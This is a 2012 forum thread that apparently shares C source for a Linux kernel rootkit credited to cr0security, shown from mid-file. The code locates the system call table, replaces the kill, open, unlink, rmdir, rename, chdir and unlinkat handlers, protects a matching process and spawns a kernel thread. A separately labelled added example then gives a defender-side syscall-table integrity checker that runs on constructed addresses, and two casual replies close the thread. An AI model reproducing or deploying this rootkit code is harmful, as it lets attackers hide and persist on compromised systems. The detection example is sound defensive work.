totheap = 6 + sizeof(hasil_konversi) + 8;
file_buf = kmalloc(200,GFP_KERNEL);
lemme_lemme_maho = kmalloc(totheap,GFP_KERNEL);
sprintf(lemme_lemme_maho,"/proc/%s/cmdline",hasil_konversi);
KERN
ev1l_proc = filp_open(lemme_lemme_maho,O_RDONLY,0);
END
if (IS_ERR(ev1l_proc))
goto closeme;
else {
KERN
ev1l_proc->f_op->read(ev1l_proc, file_buf,50, &ev1l_proc->f_pos);
END
if (strstr(file_buf,cr_PROC))
return (unsigned long *) (-ESRCH);
else
return (unsigned long *) (*kill_asli)(pid,sig);
}
closeme:
filp_close(ev1l_proc,NULL);
kfree(file_buf);
kfree(lemme_lemme_maho);
}
return (unsigned long *) (*kill_asli)(pid,sig);
}

/*init module for cr0security*/
static cr0 cr0security cr_start(void)
{
printk("\nlet met start\n");
//list_del (&THIS_MODULE->list);
//try_module_get(THIS_MODULE);
cr();
/*unsigned long *proto_sys_call = (unsigned long *) 0xc05d2180;*/
KERN
if (proto_sys_call == invalid) {
proto_sys_call = (void *) *find_sys_call_table();
}
END

#if (LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,18))
unlinkat_asli=(void *) (proto_sys_call[__NR_unlinkat]);
#endif
kill_asli = (void *) (proto_sys_call[__NR_kill]);
write_asli = (void *) (proto_sys_call[__NR_write]);
open_asli = (void *) (proto_sys_call[__NR_open]);
unlink_asli = (void *) (proto_sys_call[__NR_unlink]);
rename_asli = (void *) (proto_sys_call[__NR_rename]);
rmdir_asli = (void *) (proto_sys_call[__NR_rmdir]);
chdir_asli= (void *) (proto_sys_call[__NR_chdir]);
proto_sys_call[__NR_kill] = (unsigned long) *(cr_kill);
proto_sys_call[__NR_open] = (unsigned long) *(cr_open);
proto_sys_call[__NR_unlink] = (unsigned long) *(cr_unlink);
proto_sys_call[__NR_rmdir] = (unsigned long) *(cr_rmdir);
proto_sys_call[__NR_rename] = (unsigned long) *(cr_rename);
proto_sys_call[__NR_chdir] = (unsigned long) *(cr_chdir);
#if (LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,18))
proto_sys_call[__NR_unlinkat] = (unsigned long) *(cr_unlinkat);
#endif
//proto_sys_call[__NR_write] = (unsigned long) *(cr_write);
cr();
KERN
kernel_thread(init_cr_this_mod,NULL,0);
//tcpd_thread=kthread_run(init_cr_this_mod,NULL,"init cr0 tcpd");
END
return 0;
}

/*eof init module for cr0security*/
static void cr0security cr_end(void)
{
printk("\nlet me end\n");
cr();
proto_sys_call[__NR_rmdir] = (unsigned long) *(rmdir_asli);
proto_sys_call[__NR_rename] = (unsigned long) *(rename_asli);
proto_sys_call[__NR_kill] = (unsigned long) *(kill_asli);
//proto_sys_call[__NR_write] = (unsigned long) *(write_asli);
proto_sys_call[__NR_open] = (unsigned long) *(open_asli);
proto_sys_call[__NR_unlink] = (unsigned long) *(unlink_asli);
proto_sys_call[__NR_chdir] = (unsigned long) *(chdir_asli);
#if (LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,18))
proto_sys_call[__NR_unlinkat] = (unsigned long) *(unlinkat_asli);
#endif
cr();
//kthread_stop(tcpd_thread);
}

module_init(cr_start);
module_exit(cr_end);
MODULE_AUTHOR("cr0security.com");
MODULE_LICENSE("GPL");
===================
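The module posted above swaps entries of the system call table for its own handlers. The following is an added example (not part of the original post or of the posted code) of the defender-side integrity check: each slot in a table snapshot is compared with the address a System.map-style symbol list gives for that handler, and any slot that differs or points outside core kernel text is flagged. The snapshot, the symbol list and every address are constructed sample data, and the names sct_entry, map_lookup, check_entry and count_suspicious are hypothetical.

```c
/* Added example: syscall-table integrity check over a constructed snapshot. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed System.map-style excerpt; every address here is made up. */
static const char SAMPLE_MAP[] =
    "c0100000 T _stext\n"
    "c0150a10 T sys_kill\n"
    "c01b2c40 T sys_open\n"
    "c01b3a80 T sys_write\n"
    "c01b9d30 T sys_chdir\n"
    "c01c3e20 T sys_unlink\n"
    "c01c3f60 T sys_unlinkat\n"
    "c01c4070 T sys_rmdir\n"
    "c01c4f00 T sys_rename\n"
    "c0480000 T _etext\n";

struct sct_entry {
    const char *symbol;  /* handler the slot is expected to hold */
    uint64_t    addr;    /* address actually found in the slot */
};

/* Constructed snapshot: seven slots point into module memory, one is intact. */
static const struct sct_entry SAMPLE_SNAPSHOT[] = {
    { "sys_write",    0xc01b3a80ULL },
    { "sys_kill",     0xf8a1c650ULL },
    { "sys_open",     0xf8a1c120ULL },
    { "sys_chdir",    0xf8a1c2e0ULL },
    { "sys_unlink",   0xf8a1c4b0ULL },
    { "sys_unlinkat", 0xf8a1c520ULL },
    { "sys_rmdir",    0xf8a1c340ULL },
    { "sys_rename",   0xf8a1c3a0ULL },
};
#define SAMPLE_COUNT (sizeof(SAMPLE_SNAPSHOT) / sizeof(SAMPLE_SNAPSHOT[0]))

enum verdict { ENTRY_OK, ENTRY_MISMATCH, ENTRY_OUTSIDE_TEXT, ENTRY_UNKNOWN };

/* Find `symbol` in "addr type name" lines; returns 0 and sets *addr_out on a hit. */
int map_lookup(const char *map, const char *symbol, uint64_t *addr_out)
{
    const char *line = map;

    while (*line) {
        size_t len = strcspn(line, "\n");
        char buf[192], name[128];
        unsigned long long addr;

        if (len < sizeof(buf)) {          /* parse one line at a time */
            memcpy(buf, line, len);
            buf[len] = '\0';
            if (sscanf(buf, "%llx %*c %127s", &addr, name) == 2 &&
                strcmp(name, symbol) == 0) {
                *addr_out = addr;
                return 0;
            }
        }
        line += len;
        if (*line == '\n')
            line++;
    }
    return -1;
}

/* Classify one slot against the symbol list. */
enum verdict check_entry(const char *map, const struct sct_entry *e)
{
    uint64_t stext, etext, expected;

    if (map_lookup(map, "_stext", &stext) || map_lookup(map, "_etext", &etext))
        return ENTRY_UNKNOWN;
    if (e->addr < stext || e->addr >= etext)
        return ENTRY_OUTSIDE_TEXT;        /* e.g. a handler inside a loaded module */
    if (map_lookup(map, e->symbol, &expected))
        return ENTRY_UNKNOWN;
    return e->addr == expected ? ENTRY_OK : ENTRY_MISMATCH;
}

/* Count slots that differ from the expected handler or leave kernel text. */
size_t count_suspicious(const char *map, const struct sct_entry *tbl, size_t n)
{
    size_t hits = 0;

    for (size_t i = 0; i < n; i++) {
        enum verdict v = check_entry(map, &tbl[i]);
        if (v == ENTRY_MISMATCH || v == ENTRY_OUTSIDE_TEXT)
            hits++;
    }
    return hits;
}

int main(void)
{
    static const char *names[] = { "ok", "mismatch", "outside-text", "unknown" };

    for (size_t i = 0; i < SAMPLE_COUNT; i++) {
        const struct sct_entry *e = &SAMPLE_SNAPSHOT[i];
        printf("%-14s 0x%08llx  %s\n", e->symbol,
               (unsigned long long)e->addr, names[check_entry(SAMPLE_MAP, e)]);
    }
    printf("suspicious slots: %zu\n",
           count_suspicious(SAMPLE_MAP, SAMPLE_SNAPSHOT, SAMPLE_COUNT));
    return 0;
}
```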
05-11-2012, 01:17 AM
Post: #2
Bunga.Mataharry Away
Relax bro, go date someone first.... :P
05-11-2012, 01:41 PM
Post: #3
wendyaja Offline
wow, this is cool, smells like om wisdom's work, hmm